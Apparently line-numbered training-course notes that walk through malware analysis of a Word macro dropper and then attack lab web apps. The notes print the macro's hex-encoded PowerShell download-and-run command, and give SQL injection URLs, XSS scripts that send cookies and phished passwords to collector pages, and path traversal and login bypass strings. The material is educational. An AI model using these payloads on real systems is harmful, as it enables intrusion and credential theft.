2451 | strings malware.exe | |
2452 | ||
2453 | strings --all malware.exe | head -n 6 | |
2454 | ||
2455 | strings malware.exe | grep -i dll | |
2456 | ||
2457 | strings malware.exe | grep -i library | |
2458 | ||
2459 | strings malware.exe | grep -i reg | |
2460 | ||
2461 | strings malware.exe | grep -i hkey | |
2462 | ||
2463 | strings malware.exe | grep -i hku | |
2464 | ||
2465 | - We didn't see anything like HKLM, HKCU or other registry type stuff | |
2466 | ||
2467 | strings malware.exe | grep -i irc | |
2468 | ||
2469 | strings malware.exe | grep -i join | |
2470 | ||
2471 | strings malware.exe | grep -i admin | |
2472 | ||
2473 | strings malware.exe | grep -i list | |
2474 | ||
2475 | ||
2476 | - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands | |
2477 | ||
2478 | sudo apt-get install -y python-pefile | |
2479 | ||
2480 | vi analyse_malware.py | |
2481 | ||
2482 | python analyse_malware.py malware.exe | |
2483 | ||
2484 | ||
2485 | ||
2486 | ||
2487 | Building a Malware Scanner | |
2488 | -------------------------- | |
2489 | ||
2490 | mkdir ~/Desktop/malwarescanner | |
2491 | ||
2492 | cd ~/Desktop/malwarescanner | |
2493 | ||
2494 | wget https://github.com/jonahbaron/malwarescanner/archive/master.zip | |
2495 | ||
2496 | unzip master.zip | |
2497 | ||
2498 | cd malwarescanner-master/ | |
2499 | ||
2500 | python scanner.py -h | |
2501 | ||
2502 | cat strings.txt | |
2503 | ||
2504 | cat hashes.txt | |
2505 | ||
2506 | mkdir ~/Desktop/malcode | |
2507 | ||
2508 | cp ~/Desktop/malware.exe ~/Desktop/malcode | |
2509 | ||
2510 | python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt | |
2511 | ||
2512 | cp ~/Desktop/ | |
2513 | ||
2514 | ||
2515 | ||
2516 | ##################################################### | |
2517 | # Analyzing Macro Embedded Malware # | |
2518 | # Reference: # | |
2519 | # https://jon.glass/analyzes-dridex-malware-p1/ # | |
2520 | ##################################################### | |
2521 | cp ~/Desktop/ | |
2522 | ||
2523 | - Create a FREE account on: | |
2524 | https://malwr.com/account/signup/ | |
2525 | ||
2526 | - Grab the malware from: | |
2527 | https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/ | |
2528 | ||
2529 | file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin | |
2530 | ||
2531 | cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin | |
2532 | ||
2533 | ||
2534 | ||
2535 | ||
2536 | sudo pip install olefile | |
2537 | ||
2538 | mkdir ~/Desktop/oledump | |
2539 | ||
2540 | cd ~/Desktop/oledump | |
2541 | ||
2542 | wget http://didierstevens.com/files/software/oledump_V0_0_22.zip | |
2543 | ||
2544 | unzip oledump_V0_0_22.zip | |
2545 | ||
2546 | cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin . | |
2547 | ||
2548 | mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc | |
2549 | ||
2550 | python oledump.py 064016.doc | |
2551 | ||
2552 | python oledump.py 064016.doc -s A4 -v | |
2553 | ||
2554 | - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams. | |
2555 | - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’. | |
2556 | ||
2557 | ||
2558 | python oledump.py 064016.doc -s A5 -v | |
2559 | ||
2560 | - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners. | |
2561 | ||
2562 | ||
2563 | python oledump.py 064016.doc -s A3 -v | |
2564 | ||
2565 | - Look for "GVhkjbjv" and you should see: | |
2566 | ||
2567 | 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B | |
2568 | ||
2569 | - Take that long blob that starts with 636D and finishes with 653B and paste it in: | |
2570 | http://www.rapidtables.com/convert/number/hex-to-ascii.htm | |
2571 | ||
2572 | ||
2573 | ||
2574 | ||
2575 | ############## | |
2576 | # Yara Ninja # | |
2577 | ############## | |
2578 | cd ~/Desktop | |
2579 | ||
2580 | sudo apt-get remove -y yara | |
2581 | ||
2582 | wget https://github.com/plusvic/yara/archive/v3.4.0.zip | |
2583 | ||
2584 | sudo apt-get -y install libtool | |
2585 | ||
2586 | unzip v3.4.0.zip | |
2587 | ||
2588 | cd yara-3.4.0 | |
2589 | ||
2590 | ./bootstrap.sh | |
2591 | ||
2592 | ./configure | |
2593 | ||
2594 | make | |
2595 | ||
2596 | sudo make install | |
2597 | ||
2598 | yara -v | |
2599 | ||
2600 | cd .. | |
2601 | ||
2602 | wget https://github.com/Yara-Rules/rules/archive/master.zip | |
2603 | ||
2604 | unzip master.zip | |
2605 | ||
2606 | cd ~/Desktop | |
2607 | ||
2608 | yara rules-master/packer.yar malcode/malware.exe | |
2609 | ||
2610 | ||
2611 | Places to get more Yara rules: | |
2612 | ------------------------------ | |
2613 | https://malwareconfig.com/static/yaraRules/ | |
2614 | https://github.com/kevthehermit/YaraRules | |
2615 | https://github.com/VectraThreatLab/reyara | |
2616 | ||
2617 | ||
2618 | ||
2619 | Yara rule sorting script: | |
2620 | ------------------------- | |
2621 | https://github.com/mkayoh/yarasorter | |
2622 | ||
2623 | ||
2624 | ||
2625 | cd ~/Desktop/rules-master | |
2626 | for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar | |
2627 | cd ~/Desktop/ | |
2628 | yara rules-master/master.yar malcode/malware.exe | |
2629 | ||
2630 | ||
2631 | ||
2632 | ||
2633 | ||
2634 | ||
2635 | ||
2636 | ||
2637 | ||
2638 | ||
2639 | Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with: | |
2640 | http://derekmorton.name/files/malware_12-14-12.sql.bz2 | |
2641 | ||
2642 | ||
2643 | Malware Repositories: | |
2644 | http://malshare.com/index.php | |
2645 | http://www.malwareblacklist.com/ | |
2646 | http://www.virusign.com/ | |
2647 | http://virusshare.com/ | |
2648 | http://www.tekdefense.com/downloads/malware-samples/ | |
2649 | ||
2650 | ||
2651 | ||
2652 | ||
2653 | ############################### | |
2654 | # Creating a Malware Database # | |
2655 | ############################### | |
2656 | ||
2657 | Creating a malware database (sqlite) | |
2658 | ------------------------------------ | |
2659 | sudo apt-get install -y python-simplejson python-simplejson-dbg | |
2660 | wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py | |
2661 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
2662 | unzip malware-password-is-infected.zip | |
2663 | infected | |
2664 | python avsubmit.py --init | |
2665 | python avsubmit.py -f malware.exe -e | |
2666 | ||
2667 | ||
2668 | ||
2669 | ||
2670 | ||
2671 | Creating a malware database (mysql) | |
2672 | ----------------------------------- | |
2673 | - Step 1: Installing MySQL database | |
2674 | - Run the following command in the terminal: | |
2675 | ||
2676 | sudo apt-get install mysql-server | |
2677 | ||
2678 | - Step 2: Installing Python MySQLdb module | |
2679 | - Run the following command in the terminal: | |
2680 | ||
2681 | sudo apt-get build-dep python-mysqldb | |
2682 | sudo apt-get install python-mysqldb | |
2683 | ||
2684 | Step 3: Logging in | |
2685 | Run the following command in the terminal: | |
2686 | ||
2687 | mysql -u root -p (set a password of 'malware') | |
2688 | ||
2689 | - Then create one database by running following command: | |
2690 | ||
2691 | create database malware; | |
2692 | ||
2693 | exit; | |
2694 | ||
2695 | wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py | |
2696 | ||
2697 | vi mal_to_db.py (fill in database connection information) | |
2698 | ||
2699 | python mal_to_db.py -i | |
2700 | ||
2701 | python mal_to_db.py -f malware.exe -u | |
2702 | ||
2703 | ||
2704 | mysql -u root -p | |
2705 | malware | |
2706 | ||
2707 | mysql> use malware; | |
2708 | ||
2709 | select id,md5,sha1,sha256,time FROM files; | |
2710 | ||
2711 | mysql> quit; | |
2712 | ||
2713 | ||
2714 | ||
2715 | ||
2716 | ###################################### | |
2717 | # PCAP Analysis with forensicPCAP.py # | |
2718 | ###################################### | |
2719 | cd ~/Desktop | |
2720 | wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py | |
2721 | sudo easy_install cmd2 | |
2722 | ||
2723 | python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap | |
2724 | ||
2725 | ForPCAP >>> help | |
2726 | ||
2727 | ||
2728 | Prints stats about PCAP | |
2729 | ForPCAP >>> stat | |
2730 | ||
2731 | ||
2732 | Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command. | |
2733 | ForPCAP >>> dns | |
2734 | ||
2735 | ForPCAP >>> show | |
2736 | ||
2737 | ||
2738 | Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command. | |
2739 | ForPCAP >>> dstports | |
2740 | ||
2741 | ForPCAP >>> show | |
2742 | ||
2743 | ||
2744 | Prints the number of ip source and store them. | |
2745 | ForPCAP >>> ipsrc | |
2746 | ||
2747 | ||
2748 | Prints the number of web's requests and store them | |
2749 | ForPCAP >>> web | |
2750 | ||
2751 | ||
2752 | Prints the number of mail's requests and store them | |
2753 | ForPCAP >>> mail | |
2754 | ||
2755 | ||
2756 | ||
2757 | ################### | |
2758 | # Memory Analysis # | |
2759 | ################### | |
2760 | cd /home/malware/Desktop/Banking\ Troubles/Volatility | |
2761 | ||
2762 | python volatility | |
2763 | python volatility pslist -f ../hn_forensics.vmem | |
2764 | python volatility connscan2 -f ../hn_forensics.vmem | |
2765 | python volatility memdmp -p 888 -f ../hn_forensics.vmem | |
2766 | python volatility memdmp -p 1752 -f ../hn_forensics.vmem | |
2767 | ***Takes a few min*** | |
2768 | strings 1752.dmp | grep "^http://" | sort | uniq | |
2769 | strings 1752.dmp | grep "Ahttps://" | uniq -u | |
2770 | cd .. | |
2771 | foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2 | |
2772 | cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/ | |
2773 | cat audit.txt | |
2774 | cd pdf | |
2775 | ls | |
2776 | grep -i javascript *.pdf | |
2777 | ||
2778 | ||
2779 | ||
2780 | cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf | |
2781 | wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip | |
2782 | unzip pdf-parser_V0_6_4.zip | |
2783 | python pdf-parser.py -s javascript --raw 00600328.pdf | |
2784 | python pdf-parser.py --object 11 00600328.pdf | |
2785 | python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js | |
2786 | ||
2787 | cat malicious.js | |
2788 | ||
2789 | ||
2790 | *****Sorry - no time to cover javascript de-obfuscation today***** | |
2791 | ||
2792 | ||
2793 | cd /home/malware/Desktop/Banking\ Troubles/Volatility/ | |
2794 | python volatility files -f ../hn_forensics.vmem > files | |
2795 | cat files | less | |
2796 | python volatility malfind -f ../hn_forensics.vmem -d out | |
2797 | ls out/ | |
2798 | python volatility hivescan -f ../hn_forensics.vmem | |
2799 | python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon | |
2800 | for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done | |
2801 | ||
2802 | ||
2803 | ||
2804 | Start with simple Firefox Addons: | |
2805 | ||
2806 | - ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/ | |
2807 | - Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/ | |
2808 | - FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ | |
2809 | - Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ | |
2810 | - Wapalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/ | |
2811 | ||
2812 | A good list of web app testing add ons for Firefox: | |
2813 | https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/ | |
2814 | ||
2815 | ||
2816 | ||
2817 | ||
2818 | ||
2819 | ||
2820 | ||
2821 | ################################## | |
2822 | # Basic: Web Application Testing # | |
2823 | ################################## | |
2824 | ||
2825 | Most people are going to tell you reference the OWASP Testing guide. | |
2826 | https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents | |
2827 | ||
2828 | I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website. | |
2829 | ||
2830 | ||
2831 | The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site. | |
2832 | ||
2833 | 1. Does the website talk to a DB? | |
2834 | - Look for parameter passing (ex: site.com/page.php?id=4) | |
2835 | - If yes - try SQL Injection | |
2836 | ||
2837 | 2. Can I or someone else see what I type? | |
2838 | - If yes - try XSS | |
2839 | ||
2840 | 3. Does the page reference a file? | |
2841 | - If yes - try LFI/RFI | |
2842 | ||
2843 | Let's start with some manual testing against 54.149.82.150 | |
2844 | ||
2845 | ||
2846 | Start here: | |
2847 | http://54.149.82.150/ | |
2848 | ||
2849 | ||
2850 | There's no parameter passing on the home page so the answer to question 1 is NO. | |
2851 | There is however a search box in the top right of the webpage, so the answer to question 2 is YES. | |
2852 | ||
2853 | Try an XSS in the search box on the home page: | |
2854 | <script>alert(123);</script> | |
2855 | ||
2856 | Doing this gives us the following in the address bar: | |
2857 | http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script> | |
2858 | ||
2859 | Ok, so we've verified that there is XSS in the search box. | |
2860 | ||
2861 | Let's move on to the search box in the left of the page. | |
2862 | ||
2863 | Let's give the newsletter signup box a shot | |
2864 | ||
2865 | Moving on to the login page. | |
2866 | http://54.149.82.150/login.aspx | |
2867 | ||
2868 | I entered a single quote (') for both the user name and the password. I got the following error: | |
2869 | ||
2870 | ----------------------------------------------------------------- | |
2871 | 'Users//User[@Name=''' and @Password=''']' has an invalid token. | |
2872 | Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. | |
2873 | ||
2874 | Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token. | |
2875 | ||
2876 | Source Error: | |
2877 | ||
2878 | ||
2879 | Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml"); | |
2880 | Line 113: string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']"; | |
2881 | Line 114: XmlNodeList xmln = doc.SelectNodes(credential); | |
2882 | Line 115: //String test = xmln.ToString(); | |
2883 | Line 116: if (xmln.Count > 0) | |
2884 | ||
2885 | ----------------------------------------------------------------- | |
2886 | ||
2887 | ||
2888 | Hmm....System.Xml.XPath.XPathException.....that's not SQL. | |
2889 | ||
2890 | WTF is this: | |
2891 | Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml"); | |
2892 | ||
2893 | ||
2894 | ||
2895 | ||
2896 | In this case you'll have the trap the request with a proxy like: | |
2897 | - Firefox Tamper Data | |
2898 | - Burp Suite http://www.portswigger.net/Burp/proxy.html | |
2899 | - WebScarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project | |
2900 | - Rat Proxy https://code.google.com/p/ratproxy/ | |
2901 | - Zap Proxy https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project | |
2902 | - Paros http://sourceforge.net/projects/paros/ | |
2903 | ||
2904 | ||
2905 | ||
2906 | Let's go back to that page error message..... | |
2907 | ||
2908 | ||
2909 | Let's check it out: | |
2910 | http://54.149.82.150/AuthInfo.xml | |
2911 | ||
2912 | Looks like we found passwords!!!!!!!!!! | |
2913 | ||
2914 | ||
2915 | Looks like there no significant new functionality after logging in with the stolen credentials. | |
2916 | ||
2917 | Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links | |
2918 | ||
2919 | ||
2920 | http://54.149.82.150/bookdetail.aspx?id=2 | |
2921 | ||
2922 | ||
2923 | Ok, there is parameter passing (bookdetail.aspx?id=2). | |
2924 | ||
2925 | The page name is: bookdetail.aspx | |
2926 | The parameter name is: id | |
2927 | The paramber value is: 2 | |
2928 | ||
2929 | ||
2930 | Let's try throwing a single quote (') in there: | |
2931 | ||
2932 | http://54.149.82.150/bookdetail.aspx?id=2' | |
2933 | ||
2934 | ||
2935 | I get the following error: | |
2936 | ||
2937 | Unclosed quotation mark after the character string ''. | |
2938 | Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. | |
2939 | ||
2940 | Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''. | |
2941 | ||
2942 | ||
2943 | ||
2944 | ||
2945 | ||
2946 | ||
2947 | ||
2948 | ||
2949 | ||
2950 | ||
2951 | ############################################################################# | |
2952 | # SQL Injection # | |
2953 | # https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx # | |
2954 | ############################################################################# | |
2955 | ||
2956 | ||
2957 | - Another quick way to test for SQLI is to remove the paramter value | |
2958 | ||
2959 | ||
2960 | ############################# | |
2961 | # Error-Based SQL Injection # | |
2962 | ############################# | |
2963 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))-- | |
2964 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))-- | |
2965 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))-- | |
2966 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))-- | |
2967 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))-- | |
2968 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases | |
2969 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))-- | |
2970 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')-- | |
2971 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')-- | |
2972 | ||
2973 | ||
2974 | ||
2975 | ||
2976 | ############################# | |
2977 | # Union-Based SQL Injection # | |
2978 | ############################# | |
2979 | http://54.149.82.150/bookdetail.aspx?id=2 order by 100-- | |
2980 | http://54.149.82.150/bookdetail.aspx?id=2 order by 50-- | |
2981 | http://54.149.82.150/bookdetail.aspx?id=2 order by 25-- | |
2982 | http://54.149.82.150/bookdetail.aspx?id=2 order by 10-- | |
2983 | http://54.149.82.150/bookdetail.aspx?id=2 order by 5-- | |
2984 | http://54.149.82.150/bookdetail.aspx?id=2 order by 6-- | |
2985 | http://54.149.82.150/bookdetail.aspx?id=2 order by 7-- | |
2986 | http://54.149.82.150/bookdetail.aspx?id=2 order by 8-- | |
2987 | http://54.149.82.150/bookdetail.aspx?id=2 order by 9-- | |
2988 | http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9-- | |
2989 | ||
2990 | We are using a union select statement because we are joining the developer's query with one of our own. | |
2991 | Reference: | |
2992 | http://www.techonthenet.com/sql/union.php | |
2993 | The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements. | |
2994 | It removes duplicate rows between the various SELECT statements. | |
2995 | ||
2996 | Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types. | |
2997 | ||
2998 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9-- | |
2999 | ||
3000 | Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed. | |
3001 | ||
3002 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9-- | |
3003 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9-- | |
3004 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9-- | |
3005 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins-- | |
3006 | ||
3007 | ||
3008 | ||
3009 | ||
3010 | ||
3011 | - Another way is to see if you can get the backend to perform an arithmetic function | |
3012 | http://54.149.82.150/bookdetail.aspx?id=(2) | |
3013 | http://54.149.82.150/bookdetail.aspx?id=(4-2) | |
3014 | http://54.149.82.150/bookdetail.aspx?id=(4-1) | |
3015 | ||
3016 | ||
3017 | ||
3018 | http://54.149.82.150/bookdetail.aspx?id=2 or 1=1-- | |
3019 | http://54.149.82.150/bookdetail.aspx?id=2 or 1=2-- | |
3020 | http://54.149.82.150/bookdetail.aspx?id=1*1 | |
3021 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1# | |
3022 | http://54.149.82.150/bookdetail.aspx?id=2 or 1<99# | |
3023 | http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1# | |
3024 | http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3-- | |
3025 | http://54.149.82.150/bookdetail.aspx?id=2 &0# | |
3026 | ||
3027 | ||
3028 | ||
3029 | ||
3030 | ||
3031 | ############################### | |
3032 | # Blind SQL Injection Testing # | |
3033 | ############################### | |
3034 | Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER | |
3035 | ||
3036 | 3 - Total Characters | |
3037 | http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- | |
3038 | http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- | |
3039 | http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds) | |
3040 | ||
3041 | Let's go for a quick check to see if it's DBO | |
3042 | http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'-- | |
3043 | ||
3044 | Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun. | |
3045 | ||
3046 | D - 1st Character | |
3047 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- | |
3048 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'-- | |
3049 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'-- | |
3050 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds) | |
3051 | ||
3052 | B - 2nd Character | |
3053 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3054 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3055 | ||
3056 | O - 3rd Character | |
3057 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3058 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'-- | |
3059 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3060 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3061 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'-- | |
3062 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3063 | ||
3064 | ||
3065 | ||
3066 | ||
3067 | ||
3068 | ||
3069 | ||
3070 | ||
3071 | ||
3072 | ||
3073 | ################################################################### | |
3074 | # What is XSS # | |
3075 | # https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx # | |
3076 | ################################################################### | |
3077 | ||
3078 | OK - what is Cross Site Scripting (XSS) | |
3079 | ||
3080 | 1. Use Firefox to browse to the following location: | |
3081 | ||
3082 | http://54.172.112.249/xss_practice/ | |
3083 | ||
3084 | A really simple search page that is vulnerable should come up. | |
3085 | ||
3086 | ||
3087 | ||
3088 | ||
3089 | 2. In the search box type: | |
3090 | ||
3091 | <script>alert('So this is XSS')</script> | |
3092 | ||
3093 | ||
3094 | This should pop-up an alert window with your message in it proving XSS is in fact possible. | |
3095 | Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/ | |
3096 | ||
3097 | ||
3098 | 3. In the search box type: | |
3099 | ||
3100 | <script>alert(document.cookie)</script> | |
3101 | ||
3102 | ||
3103 | This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed. | |
3104 | Ok, click OK and then click back and go back to http://554.172.112.249/xss_practice/ | |
3105 | ||
3106 | 4. Now replace that alert script with: | |
3107 | ||
3108 | <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script> | |
3109 | ||
3110 | ||
3111 | This will actually pass your cookie to the cookie catcher that we have sitting on the webserver. | |
3112 | ||
3113 | ||
3114 | 5. Now view the stolen cookie at: | |
3115 | http://54.172.112.249/xss_practice/cookie_stealer_logs.html | |
3116 | ||
3117 | ||
3118 | The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to. | |
3119 | ||
3120 | ||
3121 | ||
3122 | ||
3123 | ||
3124 | ||
3125 | ############################ | |
3126 | # A Better Way To Demo XSS # | |
3127 | ############################ | |
3128 | ||
3129 | ||
3130 | Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box. | |
3131 | ||
3132 | ||
3133 | Use Firefox to browse to the following location: | |
3134 | ||
3135 | http://54.172.112.249/xss_practice/ | |
3136 | ||
3137 | ||
3138 | ||
3139 | Paste this in the search box | |
3140 | ---------------------------- | |
3141 | ||
3142 | ||
3143 | Option 1 | |
3144 | -------- | |
3145 | ||
3146 | <script> | |
3147 | password=prompt('Your session is expired. Please enter your password to continue',' '); | |
3148 | document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">"); | |
3149 | </script> | |
3150 | ||
3151 | ||
3152 | Now view the stolen cookie at: | |
3153 | http://54.172.112.249/xss_practice/passwords.html | |
3154 | ||
3155 | ||
3156 | ||
3157 | Option 2 | |
3158 | -------- | |
3159 | <script> | |
3160 | username=prompt('Please enter your username',' '); | |
3161 | password=prompt('Please enter your password',' '); | |
3162 | document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">"); | |
3163 | </script> | |
3164 | ||
3165 | ||
3166 | ||
3167 | ||
3168 | Now view the stolen cookie at: | |
3169 | http://54.172.112.249/xss_practice/username_password_logs.html | |
3170 | ||
3171 | ||
3172 | ||
3173 | ||
3174 | ######################################### | |
3175 | # Let's kick it up a notch with ASP.NET # | |
3176 | # http://54.200.178.220/ # | |
3177 | ######################################### | |
3178 | ||
3179 | ||
3180 | The trading Web App is on http://54.200.178.220/ | |
3181 | ||
3182 | ||
3183 | Try the following in the search box: | |
3184 | <script>alert(123);</script> | |
3185 | ' or 1=1 | |
3186 | ' and a=a | |
3187 | 1=1 | |
3188 | Joe'+OR+1=1;-- | |
3189 | ||
3190 | ||
3191 | <script>alert(123);</script> | |
3192 | ||
3193 | Open a new tab in firefox and try this: | |
3194 | http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName | |
3195 | ||
3196 | ||
3197 | Try the contact us form. | |
3198 | Open a new tab in firefox and try this: | |
3199 | http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini | |
3200 | ||
3201 | Try this on the inquiry form: | |
3202 | Joe McCray | |
3203 | 1234567890 | |
3204 | joe@strategicsec.com') waitfor delay '00:00:10'-- | |
3205 | ||
3206 | ||
3207 | Login Box: | |
3208 | ||
3209 | ' or 1=1 or ''=' | |
3210 | anything (click login instead of pressing enter) | |
3211 | ||
3212 | ||
3213 | ||
3214 | Tamper Data: (notice 2 session IDs) | |
3215 | ||
3216 | AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5 | |
3217 | IsAdmin=yes; | |
3218 | ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45 | |
3219 | ||
3220 | ||
3221 | ||
3222 | Profile - Detail (tamper data) | |
3223 | Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n | |
3224 | joe|set | |
3225 | ||
